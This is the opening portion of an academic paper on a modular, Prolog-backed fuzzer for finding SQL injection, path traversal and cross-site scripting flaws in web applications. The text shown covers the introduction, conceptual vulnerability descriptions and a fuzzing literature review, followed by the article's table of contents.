Sniping at web applications to discover input-handling vulnerabilities

Brandi, Ciro; Perrone, Gaetano; Romano, Simon Pietro

doi:10.1007/s11416-024-00518-0

Sniping at web applications to discover input-handling vulnerabilities

Original Paper
Open access
Published: 12 April 2024

(2024)
Cite this article

Download PDF

You have full access to this open access article

Journal of Computer Virology and Hacking Techniques Aims and scope Submit manuscript

Sniping at web applications to discover input-handling vulnerabilities

Download PDF

3215 Accesses
1 Citation
5 Altmetric
Explore all metrics

Abstract

Web applications play a crucial role in modern businesses, offering various services and often exposing sensitive data that can be enticing to attackers. As a result, there is a growing interest in finding innovative approaches for discovering vulnerabilities in web applications. In the evolving landscape of web security, the realm of fuzz testing has garnered substantial attention for its effectiveness in identifying vulnerabilities. However, existing literature has often underemphasized the nuances of web-centric fuzzing methodologies. This article presents a comprehensive exploration of fuzzing techniques specifically tailored to web applications, addressing the gap in the current research. Our work presents a holistic perspective on web-centric fuzzing, introduces a modular architecture that improves fuzzing effectiveness, demonstrates the reusability of certain fuzzing steps, and offers an open-source software package for the broader security community. By addressing these key contributions, we aim to facilitate advancements in web application security, empower researchers to explore new fuzzing techniques, and ultimately enhance the overall cybersecurity landscape.

Fuzzing: a survey

Article Open access 05 June 2018

Experimentation and Validation of Web Application’s Vulnerability Using Security Testing Method

A systematic review of fuzzing

Article 31 October 2023

Use our pre-submission checklist

Avoid common mistakes on your manuscript.

1 Introduction

Web applications are the cornerstone of modern digital interactions, facilitating e-commerce, social networking, and information sharing. However, their widespread use also makes them prime targets for malicious actors seeking to exploit vulnerabilities. The rapid evolution of web technologies and the proliferation of complex web applications have rendered the task of securing them increasingly challenging. One potent weapon in the arsenal of cybersecurity professionals is fuzz testing, commonly known as fuzzing. Fuzzing involves the automated injection of various inputs, often malformed or unexpected, into a target system to uncover vulnerabilities. While fuzzing has proven remarkably effective in identifying security weaknesses, its application to web environments presents unique challenges that have been underrepresented in the existing literature. This article aims to bridge this gap by presenting a comprehensive exploration of fuzzing techniques tailored explicitly to web applications. We delve into the intricacies of web-centric fuzzing, highlighting the idiosyncrasies that set it apart from traditional fuzzing approaches. Our research investigates the complexities of web technologies, including input validation, session management, and client-side interactions, shedding light on the specific challenges faced by security practitioners in this domain.

Furthermore, we introduce a modular architecture for fuzzing that not only enhances vulnerability discovery but also replicates the decision-making processes of security experts. This architecture allows for the customization of fuzzing strategies, enabling users to select and deploy specific modules according to their testing objectives. A Man In The Middle Proxy module stores interactions performed to analyze the target application. A Repeater module converts the collected interactions into template-based requests that can be used to initiate a fuzzing session. At the end of the fuzzing session, an Analyzer module converts the fuzzing results into a formal representation of the conditions observed by a security expert and is used to verify the presence of a vulnerability. We formalize these conditions by introducing the “analyzer observations” concept and show that it is possible to incorporate them into a knowledge base developed using logic programming. To this purpose, we leverage the declarative semantic of Prolog to implement a vulnerability knowledge base that converts the analyzer observations into input-handling vulnerabilities.

We demonstrate that our proposed architecture facilitates the reuse of certain fuzzing steps, significantly streamlining the security testing process. By reducing redundancy, our approach conserves computational resources and accelerates the identification of vulnerabilities.

To foster collaboration and innovation within the security community, we provide an open-source implementation of our software.^{Footnote 1} This open approach encourages researchers to explore new techniques by modifying individual modules, ultimately promoting advancements in web application security.

In conclusion, our work addresses the unique challenges of web-centric fuzzing, introduces an adaptable modular architecture, showcases the reusability of specific fuzzing steps, and offers an open-source software package. Through these contributions, we aim to enhance the security of web applications, empower researchers to innovate in the field of fuzz testing, and fortify the cybersecurity landscape as a whole.

The remainder of this paper is organized into eight sections. Section 2 introduces the security testing process and describes the input-handling vulnerabilities analyzed in this work. To understand the inner details of the proposed solution, Sect. 3 provides an introduction to Prolog and logic programming. Section 4 analyzes the state of the art with respect to Fuzzing. In Sect. 5, we show the design and implementation of our rule-based fuzzer by delving into the details of its main building modules. The proposed approach is evaluated in Sect. 6 by means of a comparative analysis with the renowned Zed Attack Proxy open-source web application scanner. In Sect. 7, we discuss a few interesting optimization strategies aimed at enhancing the performance of our fuzzer. Section 8 summarizes the obtained results and gives an insight into the prospective evolution of the proposed work.

2 Vulnerabilities in web applications

There is some debate in the literature about the “boundaries” between web security testing and web application penetration testing. Some authors define security testing as the application of automatic approaches to discover vulnerabilities instead of manual methods called penetration tests [1]. A recent study [2] provides a systematic mapping of security testing approaches in the literature by extending the scope to penetration testing methodologies, such as OWASP [3]. According to the semantics proposed by the study, even security testing processes can use automatic, manual, and semi-automatic techniques.

In the business world, the distinction between security testing and penetration testing lies in their respective execution stages. Security testing is employed throughout various phases of the development process, ensuring that security measures are incorporated from the early stages. On the other hand, penetration testing is specifically conducted in the production phase, allowing for testing in a real environment with real-world configurations. Throughout the rest of this paper, we will use the term Web Application Penetration Testing (WAPT) to refer to an “opaque-box semi-automatic security testing methodology”. This approach combines both automated and manual techniques to comprehensively identify vulnerabilities in web applications.

In this section, we describe a Web application penetration testing process by also briefly illustrating three input-handling vulnerabilities studied in this work, namely, SQL injection, path traversal, and cross-site scripting.

2.1 Web application penetration testing process

Web Application Penetration Testing (WAPT) is an “opaque-box” process that enables companies to discover vulnerabilities in web applications by simulating hacker activities. Here, the “opaque-box” refers to the tester having very little prior knowledge about the target system. The process is composed of two main phases, as described in the following:

1.
The penetration tester attempts to create a “footprint” of the web application. This includes:
- Gathering its visible content by exploring public resources as well as discovering information that seems to be hidden.
- Analyzing the application and identifying its core functions, especially those for which the web application was designed. The purpose is to have a map of all the possible Data Entry Points that the application exposes, which are the main potential flaws that a hacker recognizes in the target application.
2.
In the second phase, the penetration tester knows which path to take and whether to focus on the way the application handles inputs or on probable flaws in its inner logic. To have a comprehensive understanding of all possible application “holes” it is, however, important to explore each of the following areas:
- Focusing on the application logic means studying the client-side controls to find a way to bypass them.
- The stage that involves analyzing how the application handles access to private functionality might be the one to focus on immediately because authentication and session management techniques usually suffer from a number of design and implementation flaws.
- Input Handling attacking techniques are definitely the most widely deployed since important categories of vulnerabilities are triggered by unexpected user input. The application can be probed by fuzzing the parameters passed in a request. See the next section for insights on this topic.
- The website can represent an entry point that allows the attacker to have a complete understanding of the target network infrastructure. Defects and oversights within an application’s architecture can often enable the tester to escalate an attack, moving from one component to another to eventually compromise the entire application.

2.2 SQL injection

An SQL injection (SQLi) vulnerability allows a malicious user to manipulate the queries issued by a web application to a back-end database. Exploiting the vulnerability exposes sensitive data that cannot be retrieved when the application is used in an ordinary way. In many cases, a malicious user can modify or delete data, thus causing permanent changes to the application and altering its behavior. In some extreme situations, an attacker can also escalate privileges and compromise the underlying server or other back-end infrastructures.

2.3 Union attack

When SQL query results are returned as part of application responses, a malicious user can retrieve data from database tables. This technique makes use of an operator called UNION. The UNION operator allows the joining of several data types through two SELECT statements. It is used to perform an additional SQL query that will show illegitimate data.

2.4 Blind SQL

Blind SQL is a type of SQL Injection attack that injects either true or false conditions into the underlying database to verify the presence of a vulnerability through the observation of differences in the application’s responses. The attack is often used when the web application is vulnerable to SQL injection. Still, it only displays generic error messages, and it is not possible to confirm the vulnerability by simply observing the response content. Blind vulnerabilities can be used to access unauthorized data through challenging exploitation techniques.

2.5 Path traversal

Path Traversal (PT) is a web application vulnerability that allows attackers to access files and directories outside the web application’s root directory. The attack is performed by injecting payloads that allow access to files through directory traversal sequences using special characters (e.g., “../”) or by injecting absolute file paths. By exploiting this vulnerability, it is possible to access arbitrary files and directories in the file system of the server, including application source code and critical system configuration files. This attack is also known as “point-blank”, “directory traversal”, “directory climbing”, and “backtracking” [4].

2.6 Cross-site scripting

A Cross-site scripting (XSS) vulnerability may occur when a web application does not validate a client-side code in the input sent through an attribute of an HTTP request. When the input is received and bounced back to the browser as part of the response, the client-side code is executed. Typically, attackers exploit such a vulnerability to send malicious URLs containing malicious client-side code to a target user. Since the target user could already be authenticated in the vulnerable web application context, the injected malicious code might potentially read their cookies, session token, or other sensitive information. Cross-site scripting vulnerabilities can indeed be either reflected or stored. As already anticipated, with reflected cross-site scripting, the web application bounces back the injected payload in the content of the HTTP response. The vulnerability is usually found in search pages, error messages, and whenever the web application needs to send back information obtained in the received request. With stored XSS, instead, the injected code is stored in the web application itself. When the users visit a specific page of the vulnerable application, the maliciously stored content is retrieved, and the code is executed, thus potentially impacting all the users of the application.

3 Prolog and first-order logic programming

Our rule-based sniper discovers vulnerabilities by leveraging a vulnerability knowledge base written in Prolog. In this section, we give a high-level overview of logic, with particular reference to first-order programming logic. Logic programming was invented in 1974 by Kowalski [5]. He proved that first-order logic can be considered a useful and practical programming language with theoretical foundations. This is due to the Horn clauses studied by the logician Alfred Horn (1951) [6]. Horn clauses are the basis of logic programming as they help implement the so-called “linear resolution with selection” function (SL-resolution) [7]. SL-resolution starts with a query and resolves subsequently with rules and facts until a negation of the query is proved.

Prolog was designed as a programming language and has been extensively used in several research areas, such as molecular biology, design of VLSI (Very Large Scale Integration) systems, legislation, and options trading [8]. It can be used in every domain that can be represented as facts and rules. The language allows us to have a logical representation of the context and to easily generate a program able to solve a problem. Prolog differs from Logic Programming in several aspects. It can be considered a specialization or refinement of a program in Horn Clause Logic, where the selection rule and the search strategy are fixed [9]. A quick introduction to the Prolog syntax can be found in Matuszek’s course [10].

3.1 Logic programming and security

Logic programming finds extensive utility within the security domain. Notably, in network security, logic programming serves as a valuable tool for evaluating the security level of communication protocols [11, 12]. Furthermore, Barker and Steve (2000) [13] have adeptly employed logic programming in the formulation of Role-Based Access Control (RBAC) security models. Zech et al. (2013) [14] have demonstrated the potential of logic programming in automating the risk analysis process, thereby enhancing penetration testing endeavors with critical risk insights. Moreover, within the realm of software testing, logic programming emerges as a prevalent approach for generating test cases, as evidenced by numerous studies [15,16,17].

In another paper published in 2019 [18], Zech et al. expand the realm of test-case generation into the domain of security. The authors showcase the adeptness of a knowledge-based system in uncovering vulnerabilities within web applications. Their approach involves the introduction of a security problem concept, which serves to model the System Under Test (SUT) using a Domain Specific Language. The concept of a security risk profile is then introduced to identify the most critical vulnerability to which the SUT is susceptible. To achieve this, they devise an expert system encompassing both the security risk model and a grammar-based test data generator. To substantiate their findings, the authors engineer a state machine that can effectively identify SQL injection (SQLi) and Cross-Site Scripting (XSS) vulnerabilities. Their innovative formulation of the SUT using Specification and Description Language (SDL) proves intriguing, displaying several points of intersection with our own work. Their framework establishes a correlation between the most salient vulnerability based on security risks and the attack payloads directed at the system. Our approach follows a similar strategy, albeit with notable distinctions. We employ a knowledge-based system to facilitate the oracle module within the fuzzing process. In contrast, the cited authors employ the knowledge base to map threats to the test-data generation procedure. Additionally, our approach takes a semi-automatic route to generate template-based HTTP requests for use in the fuzzing process. This varies from their approach of utilizing a web spider, which can be susceptible to issues like forbidden errors for authenticated pages and missing links generated dynamically before the HTML page rendering phase.

4 Fuzzing: state of the art

Fuzzing, also known as fuzz testing, is an automated software testing technique designed to uncover irregularities in a target application by feeding it with invalid, unexpected, or random input data. Throughout the execution of fuzzing, the target application is closely monitored to unveil software errors that might indicate the presence of a security vulnerability. Although the notion of employing random data to trigger anomalies may appear simplistic, it has yielded impressive outcomes by identifying errors in various software applications.

Over the past two decades, fuzzing has demonstrated its exceptional efficacy in unearthing vulnerabilities that often go unnoticed by static software analysis and manual code reviews. This technique has seamlessly integrated into software development practices and is now considered an indispensable component for assuring software security.

In the literature, fuzzing techniques are categorized into three distinct types: opaque-box, grey-box, and clear-box. The classification hinges on the extent of information available about the System Under Test (SUT) before the fuzzer’s execution.

Opaque-box fuzzing techniques operate without access to any internal information about the target system, such as its source code or system documentation. These methods solely rely on input and output data. Often referred to as data-driven or input/output-driven testing, this approach keeps the intricacies of the system hidden. The testing process revolves around observing the outcomes of the system and pinpointing deviations from specified behavior. Complex fuzzers employ generative or mutational input strategies for this purpose [19].

Conversely, clear-box fuzzing techniques differ from opaque-box methods. In a clear-box approach, the tester can tap into supplementary information like source code or design specifications, offering insights into the system’s behavior. With this knowledge, it’s feasible to enhance the coverage of the system during testing, thereby boosting its overall effectiveness.

A grey-box fuzzer occupies a middle ground, adopting a “lightweight” approach to gather insights about the System Under Test (SUT). It gathers data through statistical analysis, sourced either from a static evaluation of the system or dynamic data extracted, for example, from a debugger (McNally et al. [20]). This information might not be exact, but it enables faster execution and exploration of input possibilities. Grey-box techniques initiate mutational input exploration with a seed input. When intriguing pathways are activated, the mutated input is scrutinized, prompting further mutations to explore the remaining input spectrum. The objective is to enhance behavioral coverage and unearth vulnerabilities in the system based on information gleaned from the fuzzer [21].

Our work aligns with the opaque-box fuzzing category. It pertains to emulating the actions of a security expert who manually sets up the fuzzing attack. This method becomes essential when access to the source code is unavailable. Consequently, adopting an opaque-box approach offers a viable chance of detecting vulnerabilities without any prior familiarity with the application under examination. This not only enhances the efficiency of vulnerability detection but also diminishes the time needed for a manual security assessment.

4.1 A generic fuzzing algorithm

Valentin J.M. Man et al. (2019) [22] introduced a versatile fuzzing algorithm capable of accommodating the various types of fuzzing methods described above.

The algorithm accepts a set of fuzz configurations $\mathbb {C}$ and a timeout parameter $t_{limit}$ as input, producing a set of vulnerabilities $\mathbb {B}$ as output. It is structured into two phases: a pre-processing phase, which is executed at the start of a fuzzing campaign, and a subsequent fuzzing process. Notably, some fuzzers may not implement all the functions within the fuzzing process.

The pre-processing step involves working with a set of configurations and results in a modified set of configurations tailored to the requirements of the specific fuzzing algorithm being used. During each iteration, the chosen configuration file is updated using the schedule function, considering both the time that has passed and the preconfigured time limit. This stage tackles a challenge known as Exploration vs Exploitation [23], which revolves around the allocation of computational resources. It entails finding the right equilibrium between exploring new configurations to maximize fuzzer performance and refining the existing configuration to approach the optimal solution.

Subsequently, the scheduling function endeavors to enhance system coverage and optimize performance, potentially altering the set of selected configurations. Following the scheduling phase, the next step is to determine the test input. The inputgen function defines, mutates, or generates a series of test cases to be executed against the program. It assesses whether these executions result in security policy violations. Vulnerability detection is achieved by consulting an oracle. Finally, the configuration parameters are adjusted based on the discovered vulnerabilities, using the information acquired during the current iteration through the confUpdate function. The algorithm concludes once the specified number of iterations is completed.

4.2 Related works and fuzzing problems

One of the challenges in fuzzing is selecting the configuration that best optimizes performance. Fuzzer designers must analyze the available information and make a choice that leads to an ideal outcome, such as discovering the maximum number of vulnerabilities in the shortest possible time. This challenge is often framed as the Exploration vs Exploitation problem, where the decision revolves around whether to explore new configurations or maximize the performance of a chosen configuration. Woo et al. (2013) [24] referred to this challenge as Fuzz Configuration Scheduling. Berry and Fristedt (1985) [25] delved into the problem of searching for the optimal configuration. They allocated a finite set of resources to various configurations and aimed to maximize the achievable gain. They found that a configuration minimizing the consumption of temporal resources tended to discover a greater number of vulnerabilities. Householder et al. (2012) [26] took advantage of information from a mutational black-box fuzzing execution to define an ideal configuration that maximized vulnerability discovery. They achieved this by modifying the CERT Basic Fuzzing Framework (BFF) algorithm, resulting in an 85% increase in crashes.

Table 1 Inspirational contributions from relevant works focused on software testing and their impact on the design of our solution

Sniping at web applications to discover input-handling vulnerabilities

Abstract

Similar content being viewed by others

Fuzzing: a survey

Experimentation and Validation of Web Application’s Vulnerability Using Security Testing Method

A systematic review of fuzzing

1 Introduction

2 Vulnerabilities in web applications

2.1 Web application penetration testing process

2.2 SQL injection

2.3 Union attack

2.4 Blind SQL

2.5 Path traversal

2.6 Cross-site scripting

3 Prolog and first-order logic programming

3.1 Logic programming and security

4 Fuzzing: state of the art

4.1 A generic fuzzing algorithm

4.2 Related works and fuzzing problems

5 A rule-based fuzzer to discover input handling vulnerabilities

5.1 Initialization and fuzz-run phases

5.2 Proxy

5.3 Repeater

Definition 1

5.4 Intruder

Definition 2

5.5 Analyzer

Definition 3

Definition 4

5.6 Oracle

Definition 5

6 Evaluation

6.1 Benchmark and performance metrics

6.2 Rule-based fuzzer performance

6.3 Zed attack proxy comparison

6.4 Strengths and limitations of the rule-based fuzzer

7 Optimization strategies

7.1 Performance enhancements

7.2 Payloads optimizations

7.2.1 Payload feature optimization

7.2.2 Optimization through web application enumeration

7.2.3 Payload optimization: summary results

7.3 Additional performance metrics

8 Conclusions

Notes

References

Funding

Author information

Authors and Affiliations

Corresponding author

Ethics declarations

Conflict of interest Declaration

Additional information

Publisher's Note

Rights and permissions

About this article

Cite this article

Share this article

Keywords

Search

Navigation